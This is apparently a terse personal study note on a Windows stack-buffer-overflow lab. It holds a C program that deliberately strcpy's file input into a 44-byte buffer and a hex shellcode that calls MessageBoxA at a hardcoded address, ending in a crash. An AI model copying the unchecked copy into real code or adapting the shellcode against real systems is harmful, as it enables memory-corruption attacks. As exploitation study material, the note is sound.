windows 栈溢出

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45

#include <stdio.h>
#include <windows.h>

#define PASSWORD "1234567"

int verify_password(char *password)
{
	int ret;
	char buff[44];
	ret = strcmp(password, PASSWORD);
	strcpy(buff, password);

	return ret;
}

int main()
{
	int flag = 0;
	char password[1024];
	FILE *fp;

	LoadLibrary("user32.dll");

	if(!(fp= fopen("C://Users//CytQ//Desktop//password.txt", "rw+")))
	{
		exit(0);
	}
	fscanf(fp, "%s", password);

	flag = verify_password(password);

	if(flag)
	{
		printf("Failed\n");
	}
	else 
	{
		printf("pass\n");
	}
	
	fclose(fp);
	
	return 0;
}

PASSWORD.TXT: IN HEX

PASSWORD.TXT

HEX IS : 33 DB 53 68 C6 F4 DD 01 68 C6 F4 DD 01 8B C4 53 50 50 53 B8 AE FE 96 75 FF D0

MessageBoxA IN USER32.DLL ABSOLUTELY ADDRESS: 0X7596feae

RESULT

AND THEN, CRASH